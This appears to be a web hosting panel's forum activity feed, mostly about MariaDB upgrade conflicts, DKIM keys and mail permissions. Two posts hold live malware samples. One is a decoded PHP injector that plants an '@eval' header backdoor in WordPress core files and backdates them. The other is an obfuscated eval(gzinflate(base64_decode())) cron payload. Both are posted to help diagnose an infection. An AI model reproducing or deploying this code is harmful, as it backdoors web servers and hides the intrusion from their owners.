All Activity

This is an obfuscated code in base64. Decoding this base64 sequence, it generate the following php code, that will be executed by php itself through "eval" php function: phpConfValidate('YTo0OntpOjA7czo1MDoiL2hvbWUvZm90YmFsbG5lcmQvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvbWV0YS5waHAiO2k6MTtzOjk4OiJ+ZXZhbFteXChcblxyXSpcKFteXCRdKlwkX1tBLVpdezZ9W15cW10qXFtbXlwnXCJdKltcJ1wiXUhUVFBfRDM0MUJFRFtcJ1wiXVteXF1dKlxdW15cKV0qXClbXjtdKjt+cyI7aToyO3M6MzI6IkBldmFsKCRfU0VSVkVSWydIVFRQX0QzNDFCRUQnXSk7IjtpOjM7czozMzoifl5ccypmdW5jdGlvblxzK3VwZGF0ZV9tZXRhZGF0YX5tIjt9'); function phpConfValidate($ser) { list ($fullPath, $systemEnv, $code, $pattern) = unserialize(base64_decode($ser)); $source = file_get_contents($fullPath); if (preg_match($systemEnv, $source)) { return; } if (!preg_match($pattern, $source, $matches)) { return; } $incorrectRegex = str_replace('e' . 'va' . 'l', '@?arr' . 'ay', $systemEnv); $newSource = preg_replace($incorrectRegex, '', $source); $newSource = str_replace($matches[0], $code . PHP_EOL . $matches[0], $newSource); if (!preg_match($systemEnv, $newSource)) { return; } $filemtime = filemtime($fullPath) + 10; unlink($fullPath); file_put_contents($fullPath, $newSource); touch($fullPath, $filemtime); } Decoding the following sequence: phpConfValidate('YTo0OntpOjA7czo1MDoiL2hvbWUvZm90YmFsbG5lcmQvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvbWV0YS5waHAiO2k6MTtzOjk4OiJ+ZXZhbFteXChcblxyXSpcKFteXCRdKlwkX1tBLVpdezZ9W15cW10qXFtbXlwnXCJdKltcJ1wiXUhUVFBfRDM0MUJFRFtcJ1wiXVteXF1dKlxdW15cKV0qXClbXjtdKjt+cyI7aToyO3M6MzI6IkBldmFsKCRfU0VSVkVSWydIVFRQX0QzNDFCRUQnXSk7IjtpOjM7czozMzoifl5ccypmdW5jdGlvblxzK3VwZGF0ZV9tZXRhZGF0YX5tIjt9'); ...we will get the a code, that will saved and be executed in your server: a:4:{i:0;s:50:"/home/fotballnerd/public_html/wp-includes/meta.php";i:1;s:98:"~eval[^\(\n\r]*\([^\$]*\$_[A-Z]{6}[^\[]*\[[^\'\"]*[\'\"]HTTP_D341BED[\'\"][^\]]*\][^\)]*\)[^;]*;~s";i:2;s:32:"@eval($_SERVER['HTTP_D341BED']);";i:3;s:33:"~^\s*function\s+update_metadata~m";} Its a sequence of obsfuscated sequences of codes. This last line make sense to you? If no, is strongly possible your user is trying to crack your server. Check a discussion on this site: https://www.operationdecode.com/http-header-injection-and-modsecurity-evasion/ The result on your server is very similar to what is shown on this site, like they said: "Further analysis also indicated that this method could be used to connect to a C2 and act as a zombie host. Throughout our investigation, and in reviewing a large number of these cron and files; we can see this is a direct attack on WordPress, where the code is being injected into default WordPress files that are required for the WordPress page to load. What this allows for, is the malicious actor to send the request directly to the domain name, and not to the affected files to get the desired outcome. Furthermore, when reviewing the access logs, there is no evidence of an attack. What is visible in the logs are only the GET requests to the root of the website. This was tested on a local installation of an infected site. (...) As this method for persistence and connecting to a c2 is very stealthy, it is not easily detected and may be overlooked. A search via the command line for "@eval(http_" should help in finding if this infection exists in your WordPress installation." Regards, Netino

You can use the following command: opendkim-genkey -b 1024 -d yourdomain.com -D /etc/opendkim/keys/yourdomain.com -s yourselector -v If that doesn't work, you'll need to resort to a longer checklist, which you can check here: <https://easydmarc.com/blog/how-to-configure-dkim-opendkim-with-postfix/> Regards, Netino

Hi everyone, I am running CWP on Almalinux8 and recently ran into an email‐delivery problem. When I checked /etc/opendkim/userkeys/mydomain.com, I discovered that both default.txt (DNS record) and default.private (signing key) are missing. What I have tried so far: Used the DKIM Manager in CWP to regenerate keys. Rebuilt/restarted the mailserver via CWP’s control panel. Unfortunately, the key files never appear and the DKIM signature remains invalid. Can anyone share the exact steps or commands to regenerate the DKIM key pair (default.txt / default.private) for a domain under CWP?

Some users are creating cron jobs under their usename. How can i make shure that this stops? looks like this: /usr/bin/php -r 'eval(gzinflate(base64_decode("jVJrb5swFP2eX8GkSCRqNUHbpIqmaWvTkidLQxriME0RGFMMxjAwUJj632fIsw9p8wd8jc85995z3YjcqB9SRzcJtk2GWuL6MZRmlEUz7+YalqGs3oV4euFm1mqZGUFPWgdKYg06BAbzDA51bA2IBy5cyVrlmX15w8xVx7OGum8AlXN0ab3o5ObwBs8u/K76yMqZ51/N8PjMAIZrKQyBvgst8lyARQQn9VmzJyT3gcxup3pko9LoreQOXMnSb6AwC5Ccgv6YYxgcyzkGS3epK7eOdqdK6nKsaMruv861FJnjnu2KP9E5v08s4DF74rEzWIyuzcewmF2qXbUcdUf+LbF5b5O+5iwlfaH7+mJV2CNd0eZAmpc/7pS+tpxTsPCvR17lj1r5U6pliB3SgbCIApv3bg9IxvspJ5d6bgwUydB7zACaW8Vr0GGc2xPbXxpOSiHDIRXeTqCZoLgt/Gk0BL4ITpjQajopIQ8mc8+FZlIkDAX3NOMxDG3Et8hkDMW0LXwVUsrZmEuVqGWZCepebWxUwbayPG+l2kzCNIaI4x1M0OYJsQ0MKUOUJcdcOyx2hFYUo6dNYDLotl7l38q0q2qF3YoRS2O6pb4cBD6dKuzKPfB5UN+g5B9K29oxhWEcI8g09ISeeQ8JizcxiogJ+fNFovBZEDOz3oh4Lojfv5lxXB/NQjw1cG8GRfli70dd517sTSquJR6b/oB8Wsi+pZ/Sr92geAUPw4fN/WzKo9fXB5Gd6vHzzrxT+4+0//GtGnXAcLAfex2fjFs4E2RpS0spwdR/9xTqxxKlHz2WD5pgYVoVfII4ZOWIl8Zf")));'

Recreate the user and try the upgrade again: CREATE USER `mariadb.sys`@`localhost` ACCOUNT LOCK PASSWORD EXPIRE; GRANT SELECT, DELETE ON `mysql`.`global_priv` TO `mariadb.sys`@`localhost`;

Hi Sandeep, The upgrade went with a few hiccups but i managed to it working. when i do mysql -V it shows me mysql Ver 15.1 Distrib 10.11.11-MariaDB, for Linux (x86_64) using readline 5.1 but after i did the command mysql_upgrade --force and i scrolled up it gave me this : mysql.transaction_registry OK mysql.user OK Phase 2/8: Installing used storage engines... Skipped Phase 3/8: Running 'mysql_fix_privilege_tables' Phase 4/8: Fixing views mysql.user Warning : The user specified as a definer ('mariadb.sys'@'localhost') does not exist status : OK sys.host_summary OK the rest says all ok... behind. is this an issue or ? regards Mike

Warning: failed loading '/etc/yum.repos.d/mariadb.repo', skipping. (this file is in the right location and has the following content: name = MariaDB baseurl = https://rpm.mariadb.org/10.11/centos/$releasever/$basearch module_hotfixes = 1 gpgkey = https://rpm.mariadb.org/RPM-GPG-KEY-MariaDB gpgcheck = 1 ) This is on a brand new server than my last failed attempt at doing this. I dont know what to say, except this is not working for alma8.

There are probably 20 of these conflicts

Probably you tried many things before which can cause the issues, check the logs or create seperate topic

right now I am in a situation where I dont have a working database. Cant even login to centos cwp.

Try rpm -e --nodeps mysql-common-8.0.41-1.module_el8.10.0+3965+b415b607.x86_64

The install seemed to go smoothly but got a bunch of character set errors. Total 66 MB/s | 155 MB 00:02 Running transaction check Transaction check succeeded. Running transaction test The downloaded packages were saved in cache until the next successful transaction. You can remove cached packages by executing 'yum clean packages'. Error: Transaction test error: file /usr/share/mysql/charsets/Index.xml from install of MariaDB-common-10.11.11-1.el8.x86_64 conflicts with file from package mysql-common-8.0.41-1.module_el8.10.0+3965+b415b607.x86_64

Making progress but getting this error which prevents me from starting or stopping mysql Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock

typo above --nopdeps

this is not same command here the alpha case is sensitive

Hi, run the MySQL secure installation and remove the test db mysql_secure_instalaltionYou may need the root password for MySQL to proceed, located in /root/.my.cnf

I thought I did that with these commands

You need to remove mariadb server rpm dnf module disable mariadb -y rpm -e --nodeps mariadb-server If you get any other conflicting package use the same rpm remove commands and replace the mariadb-server with the conflicting package name. After that use same procedure to update mariadb

oops. I did not notice the error messages........ [root@server ~]# yum install MariaDB-server MariaDB-client net-snmp perl-DBD-MySQL -y CentOS Web Panel repo for Linux 8 - x86_64 433 kB/s | 305 kB 00:00 AlmaLinux 8 - BaseOS 44 MB/s | 22 MB 00:00 AlmaLinux 8 - AppStream 44 MB/s | 17 MB 00:00 AlmaLinux 8 - Extras 82 kB/s | 14 kB 00:00 AlmaLinux 8 - PowerTools 19 MB/s | 4.4 MB 00:00 AlmaLinux 8 - PowerTools Source 343 kB/s | 139 kB 00:00 AlmaLinux 8 - PowerTools debuginfo 2.0 MB/s | 744 kB 00:00 Extra Packages for Enterprise Linux 8 - x86_64 14 MB/s | 14 MB 00:00 Extra Packages for Enterprise Linux Modular 8 - 1.1 MB/s | 733 kB 00:00 MariaDB 332 kB/s | 624 kB 00:01 Package perl-DBD-MySQL-4.046-3.module_el8.6.0+2827+49d66dc3.x86_64 is already installed. Error: Problem: problem with installed package mariadb-gssapi-server-3:10.3.39-1.modul e_el8.8.0+3609+204d4ab0.x86_64 - package mariadb-gssapi-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from @System requires mariadb-server(x86-64) = 3:10.3.39-1.module_el8.8.0+3609+204d4ab0, but none of the providers can be installed - package mariadb-gssapi-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from appstream requires mariadb-server(x86-64) = 3:10.3.39-1.module_el8.8.0+3609+204d4ab0, but none of the providers can be installed - package mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from @System conflicts with mysql-server provided by MariaDB-server-10.11.11-1.el8.x86_64 from mariadb - package MariaDB-server-10.11.11-1.el8.x86_64 from mariadb obsoletes mariadb-server provided by mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from @System - package mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from appstream conflicts with mysql-server provided by MariaDB-server-10.11.11-1.el8.x86_64 from mariadb - package MariaDB-server-10.11.11-1.el8.x86_64 from mariadb obsoletes mariadb-server provided by mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from appstream - cannot install the best candidate for the job (try to add '--allowerasing' to command line to replace conflicting packages or '--skip-broken' to skip uninstallable packages or '--nobest' to use not only best candidate packages) [root@server ~]# yum update -y Last metadata expiration check: 0:00:26 ago on Thu 17 Apr 2025 04:06:19 PM UTC. Error: Problem 1: package mariadb-gssapi-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from @System requires mariadb-server(x86-64) = 3:10.3.39-1.module_el8.8.0+3609+204d4ab0, but none of the providers can be installed - package mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from @System conflicts with mysql-server provided by MariaDB-server-10.11.11-1.el8.x86_64 from mariadb - package MariaDB-server-10.11.11-1.el8.x86_64 from mariadb obsoletes mariadb-server provided by mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from @System - package mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from appstream conflicts with mysql-server provided by MariaDB-server-10.11.11-1.el8.x86_64 from mariadb - package MariaDB-server-10.11.11-1.el8.x86_64 from mariadb obsoletes mariadb-server provided by mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from appstream - cannot install the best update candidate for package mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 - cannot install the best update candidate for package mariadb-gssapi-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 Problem 2: problem with installed package mariadb-gssapi-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 - package mariadb-gssapi-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from @System requires mariadb-server(x86-64) = 3:10.3.39-1.module_el8.8.0+3609+204d4ab0, but none of the providers can be installed - package mariadb-gssapi-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from appstream requires mariadb-server(x86-64) = 3:10.3.39-1.module_el8.8.0+3609+204d4ab0, but none of the providers can be installed - package mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from @System conflicts with mysql-server provided by MariaDB-server-10.11.11-1.el8.x86_64 from mariadb - package MariaDB-server-10.11.11-1.el8.x86_64 from mariadb obsoletes mariadb-server provided by mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from @System - package mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from appstream conflicts with mysql-server provided by MariaDB-server-10.11.11-1.el8.x86_64 from mariadb - package MariaDB-server-10.11.11-1.el8.x86_64 from mariadb obsoletes mariadb-server provided by mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from appstream - cannot install the best update candidate for package mariadb-server-utils-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 (try to add '--allowerasing' to command line to replace conflicting packages or '--skip-broken' to skip uninstallable packages or '--nobest' to use not only best candidate packages)

So on my new install alma8 I did exactly as you said. No errors at any point. But when I checked the version it still said 10.3. I looked on my cwp panel and noticed that the php version was 5.3. Why is cwp still installing 5.3? Anyway, I am upgrading php to 8.1 at this time and will try it again. But I dont have great expectations. mysql -V mysql Ver 15.1 Distrib 10.3.39-MariaDB, for Linux (x86_64) using readline 5.1

Hi In one of my CWP instances, any mysql user logging into phpmyadmin can access any database. Can you please help

hi try to run this api fix /scripts/cwp_api account mail_fix_permissions

When I login to webmail of any user account getting the following errors Connection to storage server failed. Server Error: AUTHENTICATE PLAIN: Authentication failed tail /var/log/dovecot.log Apr 12 17:39:56 imap(user@domain.tld)<7976><MQR4w5AygsJq2UlB>: Error: stat(/var/vmail/domain/user/tmp) failed: Permission denied (euid=1017(user) egid=12(mail) missing +x perm: /var/vmail/domain, dir owned by 101:12 mode=0700)

This is resolved. Old repos of centos were still present after elevate upgrade.

Getting the error. Looks like something messed up earlier during upgrade to almalinux 8? Please help CentOS-Stream - AppStream 492 B/s | 257 B 00:00 Errors during downloading metadata for repository 'Stream-AppStream': - Status code: 404 for http://repo.centos-webpanel.com/8-cwp-stream/stable/AppStream/x86_64/os/repodata/repomd.xml (IP: 5.196.100.135) Error: Failed to download metadata for repo 'Stream-AppStream': Cannot download repomd.xml: Cannot download repodata/repomd.xml: All mirrors were tried